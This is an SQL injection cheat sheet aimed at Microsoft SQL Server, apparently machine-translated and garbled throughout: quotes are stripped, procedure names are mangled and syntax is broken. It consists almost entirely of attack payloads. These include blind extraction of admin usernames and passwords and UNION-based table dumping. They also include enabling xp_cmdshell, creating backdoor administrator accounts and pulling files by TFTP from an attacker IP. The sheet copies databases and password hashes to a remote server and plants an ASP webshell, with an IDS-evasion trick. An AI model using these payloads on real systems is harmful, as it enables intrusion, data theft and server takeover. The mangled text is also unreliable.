[SQL] SQL Injection

1. determine whether there are any injection points
; And 1 = 1 and 1 = 2 2. Generally, the name of the table to be guessed is nothing more than admin adminuser user pass password ..
And 0 <> (select count (*) from *)
And 0 <> (select count (*) from Admin) --- determine whether the admin table exists. if the number of accounts is 0, <return correct page 1 <Return Error Page 1 indicates that the number of accounts is 1
And 0 <(select count (*) from Admin)
And 1 <(select count (*) from Admin) 4. Add the field name that we think of in Len () brackets.
And 1 = (select count (*) from Admin where Len (*)> 0 )--
And 1 = (select count (*) from Admin where Len (User field name)> 0)
And 1 = (select count (*) from Admin where Len (password field name)> 0) 5. the length of each field is changed to 0 until the correct page is returned.
And 1 = (select count (*) from Admin where Len (*)> 0)
And 1 = (select count (*) from Admin where Len (name)> 6) Error
And 1 = (select count (*) from Admin where Len (name)> 5) the correct length is 6
And 1 = (select count (*) from admin where len (name) = 6) correct and 1 = (select count (*) from admin where len (password)> 11) Correct
And 1 = (select count (*) from admin where len (password)> 12) the error length is 12
And 1 = (select count (*) from admin where len (password) = 12) Correct 6. Explain characters
And 1 = (select count (*) from admin where left (name, 1) =) ---
First
And 1 = (select count (*) from admin where left (name, 2) = AB) ---
Second place
Just add one character at a time to guess the number of digits you just guessed.
Now
And 1 = (select top 1 count (*) from Admin where Asc (mid (pass, 5, 1) = 51 )--
This query statement can be used to guess the chinese user and password. You only need to replace the following number with the Chinese ASSIC code.
. Finally, convert the result into a character. group by users. id having 1 = 1 --
Group by users. id, users. username, users. password, users. privs having 1 = 1
--
; Insert into users values (666, attacker, foobar, 0 xffff) -- union select top 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME
= Logintable-
Union select top 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME
= Logintable WHERE COLUMN_NAME not in (login_id )-
Union select top 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME
= Logintable WHERE COLUMN_NAME not in (login_id, login_name )-
Union select top 1 login_name FROM logintable-
Union select top 1 password FROM logintable where login_name = Rahul -- check the server patch = An error occurred while patching SP4.
And 1 = (select @ VERSION) -- check the permissions of the database connection account. The returned result is normal, proving that it is the server role sysadmin permission.
And 1 = (SELECT IS_SRVROLEMEMBER (sysadmin) -- determine the database account to connect. (Using the SA account for connection returns normal = proves that the connection account is SA)
And sa = (SELECT System_user )--
And user_name () = dbo --
And 0 <> (select user_name () -- check whether xp_cmdshell is deleted
And 1 = (select count (*) from Master. DBO. sysobjects where xtype = x and name
= Xp_cmdshell) -- xp_cmdshell is deleted and restored. It supports absolute path recovery.
; Exec master. DBO. sp_addextendedproc xp_mongoshell, xplog70.dll --
; Exec master. DBO. sp_addextendedproc xp_mongoshell, C:/inetpub/wwwroot/xplog70
. Dll -- reverse ping your own experiment
; Use master; declare @ s int; Exec sp_oacreate "wscript. Shell", @ s out; Exec
Sp_oamethod
@ S, "run", null, "cmd.exe/c Ping 192.168.0.1"; -- add an account
; Declare @ shell int exec sp_oacreate wscript. Shell, @ shell output Exec
Sp_oamethod
@ Shell, run, null, C:/winnt/system32/cmd.exe/C net user f2s $ f2s/Add -- create a virtual directory e Disk:
; Declare @ o int exec sp_oacreate wscript. Shell, @ o out exec sp_oamethod @
O, run, NULL, cscript.exe c:/inetpub/wwwroot/mkwebdir. vbs-w "Default Web site
"-V" e "," e:/"-- access attribute: (write a webshell together)
Declare @ o int exec sp_oacreate wscript. shell, @ o out exec sp_oamethod @ o
, Run, NULL, cscript.exe c:/inetpub/wwwroot/chaccess. vbs-a w3svc/1/ROOT
/E + browse: % 5c =/or submit/AND/modify % 5
And 0 <> (select top 1 paths from newtable) -- Obtain the Database Name (from 1 to 5 are system IDs, more than 6 can be determined)
And 1 = (select name from master. dbo. sysdatabases where dbid = 7 )--
And 0 <> (select count (*) from master. dbo. sysdatabases where name> 1 and dbid
= 6)
Submit dbid =, 9... to get more database names and 0 <> (select top 1 name from bbs. dbo. sysobjects where xtype = U) to one
The table is assumed to be admin.
And 0 <> (select top 1 name from bbs. dbo. sysobjects where xtype = U and name
Not in (Admin) to obtain other tables.
And 0 <> (select count (*) from bbs. dbo. sysobjects where xtype = U and name = adminand uid> (str (id) the brute-force value to UID is assumed to be 18779569 uid = id
And 0 <> (select top 1 name from bbs. dbo. syscolumns where id = 18779569)
An admin field, which is assumed to be user_id
And 0 <> (select top 1 name from bbs. dbo. syscolumns where id = 18779569 and name
Not in
(Id,...) to expose other fields
And 0 <(select user_id from BBS. dbo. admin where username> 1). You can obtain the username and password in sequence ..... Assume that the user_id username, password, and other fields and 0 <> (select count (*) from master. dbo. sysdatabases where name> 1 and dbid exist.
= 6)
And 0 <> (select top 1 name from bbs. dbo. sysobjects where xtype = U) to obtain the table name and 0 <> (select top 1 name from bbs. dbo. sysobjects where xtype = U and name
Not in (Address ))
And 0 <> (select count (*) from bbs. dbo. sysobjects where xtype = U and name = admin
And uid> (str (id) determine the id value
And 0 <> (select top 1 name from BBS. dbo. syscolumns where id = 773577794) All
Field? Id =-1 union select 1, 2, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, * from admin
? Id =-1 union select 1, 2, 4, 5, 6, 7, 8, *, 9, 10, 11, 12, 13 from admin (union, access
) Obtain the WEB path.
; Create table [dbo]. [swap] ([swappass] [char] (255 ));--
And (select top 1 swappass from swap) = 1 --
; Create table newtable (id int IDENTITY (500), paths varchar () Declare @
Test varchar (20) exec master .. xp_regread @ rootkey = HKEY_LOCAL_MACHINE, @ key
= SYSTEM/CurrentControlSet/Services/W3SVC/Parameters/Virtual Roots/, @ value_name
=/, Values = @ test OUTPUT insert into paths (path) values (@ test )--
; Use ku1 ;--
; Create table cmd (str image); -- creates an image-type table. cmd has the xp_cmdshell test procedure:
; Exec master .. xp_mongoshell dir
; Exec master. DBO. sp_addlogin f2s $; -- add an SQL account
; Exec master. DBO. sp_password null, f2s $, f2s ;--
; Exec master. DBO. SP_ADDSRVROLEMEMBER f2s $ SysAdmin ;--
; Exec master. DBO. xp_cmdshell net user f2s $ f2s/workstations: */times: All
/Passwordchg: yes/passwordreq: yes/active: yes/Add ;--
; Exec master. DBO. xp_mongoshell net localgroup administrators f2s $/Add ;--
Exec master .. xp_servicecontrol start, schedule start service
Exec master .. xp_servicecontrol start, Server
; Declare @ shell int exec sp_oacreate wscript. Shell, @ shell output Exec
Sp_oamethod
@ Shell, run, null, C:/winnt/system32/cmd.exe/C net user f2s $ f2s/Add
; Declare @ shell int exec sp_oacreate wscript. Shell, @ shell output Exec
Sp_oamethod
@ Shell, run, null, C:/winnt/system32/cmd.exe/C net localgroup Administrators
F2s $/add
; Exec master .. xp_cmdshell tftp-I youip get file.exe -- use TFTP to upload files; declare @ a sysname set @ a = xp _ + export shell exec @ a dir c :/
; Declare @ a sysname set @ a = xp + _ cm '+ 'dshell exec @ a dir c :/
; Declare @ a; set @ a = db_name (); backup database @ a to disk = your IP address, your shared directory
Bak. dat
If it is restricted, you can.
Select * from openrowset (sqloledb, server; sa;, select OK! Exec
Master. dbo. sp_addlogin
Hax) query structure:
SELECT * FROM news WHERE id =... AND topic =... AND .....
Adminand 1 = (select count (*) from [user] where username = victim and right (left
(Userpass, 01), 1) = 1) and userpass <>
Select 123 ;--
; Use master ;--
: A or name like fff %; -- displays a user named ffff.
And 1 <> (select count (email) from [user]); --
; Update [users] set email = (select top 1 name from sysobjects where xtype =
U and status> 0) where name = ffff ;--
; Update [users] set email = (select top 1 id from sysobjects where xtype = u
And name = ad) where name = ffff ;--
; Update [users] set email = (select top 1 name from sysobjects where xtype =
U and id> 581577110) where name = ffff ;--
; Update [users] set email = (select top 1 count (id) from password) where name
= Ffff ;--
; Update [users] set email = (select top 1 pwd from password where id = 2) where
Name = ffff ;--
; Update [users] set email = (select top 1 name from password where id = 2) where
Name = ffff ;--
The preceding statement is used to obtain the first user table in the database and put the table name in the ffff user's mailbox field. By viewing ffff user information, you can obtain the first table named ad.
Then, the ID of the table is obtained based on the table name ad. The name of the second table is insert into users values (666, char (0x63) + char (0x68) + char (0x72) + char (0x69
) + Char (0x73), char (0x63) + char (0x68) + char (0x72) + char (0x69) + char (0x73), 0 xffff
)--
Insert into users values (667,123,123, 0 xffff )--
Insert into users values (123, admin --, password, 0 xffff )--
; And user> 0
; And (select count (*) from sysobjects)> 0
; And (select count (*) from mysysobjects)> 0 // name of the data table in the access Database
; Update aaa set aaa = (select top 1 name from sysobjects where xtype = u and
Status> 0 );--
This is to update the first table name to the aaa field.
Read the first table. The second table can be read in this way (ADD and name after the condition <> the obtained table
Name ).
; Update aaa set aaa = (select top 1 name from sysobjects where xtype = u and
Status> 0 and name <> vote );--
Then id = 1552 and exists (select * from aaa where aaa> 5)
Read the second table one by one until no.
The read field is as follows:
; Update aaa set aaa = (select top 1 col_name (object_id (table name), 1 ));--
Then id = 152 and exists (select * from aaa where aaa> 5) error.
; Update aaa set aaa = (select top 1 col_name (object_id (table name), 2 ));--
Then, an error occurs in id = 152 and exists (select * from aaa where aaa> 5). Obtain the field name [obtain the table name] [update the field value to the table name, read the value of this field to get the table name.]
Update table name set field = (select top 1 name from sysobjects where xtype = u and
Status> 0 [and name <> you get a table name and add one]) [where condition] select
Top 1 name from sysobjects where xtype = u and status> 0 and name not in (table1
, Table2 ,...)
Create a database administrator account and a system administrator account through SQLSERVER injection vulnerability [the current account must be SYSADMIN
Group] [obtain the data table field name] [update the field value to the field name, and read the value of this field to obtain the word
Segment name]
Update table name set field = (select top 1 col_name (object_id (name of the data table to be queried), word
Segment columns such as: 1) [where condition] bypassing IDS detection [using variables]
; Declare @ a sysname set @ a = xp _ + export shell exec @ a dir c :/
; Declare @ a sysname set @ a = xp + _ cm '+ 'dshell exec @ a dir c:/1. enable remote database
Basic syntax
Select * from OPENROWSET (SQLOLEDB, server = servername; uid = sa; pwd = 123, select
* From table1)
Parameter: (1) OLEDB Provider name
2. The connection string parameter can be any port used for connection, for example
Select * from OPENROWSET (SQLOLEDB, uid = sa; pwd = 123; Network = DBMSSOCN; Address
= 192.168.0.1, 1433;, select * from table
3. Copy the entire database of the target host to insert all remote tables to the local table. Basic Syntax:
Insert into OPENROWSET (SQLOLEDB, server = servername; uid = sa; pwd = 123, select
* From table1) select * from table2
This line of statements copies all the data in table 2 on the target host to table 1 in the remote database. Real
Modify the IP address and port of the connection string to point to the desired location, for example:
Insert into OPENROWSET (SQLOLEDB, uid = sa; pwd = 123; Network = DBMSSOCN; Address = 192
. 168.0.1, 1433;, select * from table1) select * from table2
Insert into OPENROWSET (SQLOLEDB, uid = sa; pwd = 123; Network = DBMSSOCN; Address = 192
. 168.0.1, 1433;, select * from _ sysdatabases)
Select * from master. dbo. sysdatabases
Insert into OPENROWSET (SQLOLEDB, uid = sa; pwd = 123; Network = DBMSSOCN; Address = 192
. 168.0.1, 1433;, select * from _ sysobjects)
Select * from user_database.dbo.sysobjects
Insert into OPENROWSET (SQLOLEDB, uid = sa; pwd = 123; Network = DBMSSOCN; Address = 192
. 168.0.1, 1433;, select * from _ syscolumns)
Select * from user_database.dbo.syscolumns
Copy a database:
Insert into OPENROWSET (SQLOLEDB, uid = sa; pwd = 123; Network = DBMSSOCN; Address = 192
. 168.0.1, 1433;, select * from table1) select * from database .. table1
Insert into OPENROWSET (SQLOLEDB, uid = sa; pwd = 123; Network = DBMSSOCN; Address = 192
. 168.0.1, 1433;, select * from table2) select * from database .. table2 copy the HASH of the maxcompute table (hash) logon password and store it in sysxlogins. The method is as follows:
Insert into OPENROWSET (SQLOLEDB, uid = sa; pwd = 123; Network = DBMSSOCN; Address =
192.168.0.1, 1433;, select * from _ sysxlogins) select * from
Database. dbo. sysxlogins can be cracked by brute force after hash is obtained. To traverse the directory, create a temporary table: temp.
; Create table temp (id nvarchar (255), num1 nvarchar (255), num2 nvarchar (255)
, Num3 nvarchar (255 ));--
; Insert temp exec master. dbo. xp_availablemedia; -- get all current drives
; Insert into temp (id) exec master. dbo. xp_subdirs c:/; -- get the subdirectory list
; Insert into temp (id, num1) exec master. dbo. xp_dirtree c:/; -- get all sub-projects
Directory tree structure, and inch into the temp table
; Insert into temp (id) exec master. dbo. xp_shareshell type c:/web/index. asp ;-
-View the content of a file
; Insert into temp (id) exec master. dbo. xp_shareshell dir c :/;--
; Insert into temp (id) exec master. dbo. xp_shareshell dir c:/*. asp/s/;--
; Insert into temp (id) exec master. dbo. xp_cmdshell cscript
C:/Inetpub/AdminScripts
/Adsutil. vbs enum w3svc
; Insert into temp (id, num1) exec master. dbo. xp_dirtree c:/; -- (xp_dirtree
PUBLIC permission)
Write table:
Statement 1: and 1 = (SELECT IS_SRVROLEMEMBER (sysadmin ));--
Statement 2: and 1 = (SELECT IS_SRVROLEMEMBER (serveradmin ));--
Statement 3: and 1 = (SELECT IS_SRVROLEMEMBER (setupadmin ));--
Statement 4: and 1 = (SELECT IS_SRVROLEMEMBER (securityadmin ));--
Statement 5: and 1 = (SELECT IS_SRVROLEMEMBER (securityadmin ));--
Statement 6: and 1 = (SELECT IS_SRVROLEMEMBER (diskadmin ));--
Statement 7: and 1 = (SELECT IS_SRVROLEMEMBER (bulkadmin ));--
Statement 8: and 1 = (select is_srvrolemember (bulkadmin ));--
Statement 9: and 1 = (select is_member (db_owner); -- write the path to the table:
; Create Table dirs (paths varchar (100), Id INT )--
; Insert dirs exec master. DBO. xp_dirtree C :/--
And 0 <> (select top 1 paths from dirs )--
And 0 <> (select top 1 paths from dirs where paths not in (@ inetpub ))--
; Create Table dirs1 (paths varchar (100), Id INT )--
; Insert dirs exec master. DBO. xp_dirtree E:/Web --
And 0 <> (select top 1 paths from dirs1) -- back up the database to the web directory: Download
; Declare @ A sysname; Set @ A = db_name (); backup database @ A to disk = E:/web/down
. Bak; -- and 1 = (select top 1 name from (select Top 12 ID, name from sysobjects where
Xtype = char (85) T order by id desc)
And 1 = (select top 1 col_name (object_id (user_login), 1) from sysobjects) parameter
View related tables.
And 1 = (select user_id from USER_LOGIN)
And 0 = (select user from USER_LOGIN where user> 1)-=-wscript. shell example-=-
Declare @ o int
Exec sp_oacreate wscript. shell, @ o out
Exec sp_oamethod @ o, run, NULL, notepad.exe
; Declare @ o int exec sp_oacreate wscript. shell, @ o out exec sp_oamethod
@ O, run, NULL, notepad.exe -- declare @ o int, @ f int, @ t int, @ ret int
Declare @ line varchar (8000)
Exec sp_oacreate scripting. filesystemobject, @ o out
Exec sp_oamethod @ o, opentextfile, @ f out, c:/boot. ini, 1
Exec @ ret = sp_oamethod @ f, readline, @ line out
While (@ ret = 0)
Begin
Print @ line
Exec @ ret = sp_oamethod @ f, readline, @ line out
Enddeclare @ o int, @ f int, @ t int, @ ret int
Exec sp_oacreate scripting. FileSystemObject, @ o out
Exec sp_oamethod @ o, createtextfile, @ F out, C:/inetpub/wwwroot/Foo. asp,
1
Exec @ ret = sp_oamethod @ F, writeline, null,
<% Set O = server. Createobject ("wscript. Shell"): O. Run (request. querystring
("Cmd") %> declare @ o int, @ RET int
Exec sp_oacreate speech. voicetext, @ o out
Exec sp_oamethod @ o, register, null, Foo, bar
Exec sp_oasetproperty @ o, speed, 150
Exec sp_oamethod @ o, speak, null, all your sequel servers are belong to, US
, 528
Waitfor delay 00:00:05; declare @ o int, @ RET int exec sp_oacreate speech. voicetext, @ o out Exec
Sp_oamethod @ o, register, null, Foo, bar exec sp_oasetproperty @ o, speed
, 150 exec sp_oamethod @ o, speak, null, all your sequel servers are belong
To us, 528 waitfor delay 00:00:05 -- xp_dirtree permission public
Exec master. DBO. xp_dirtree C :/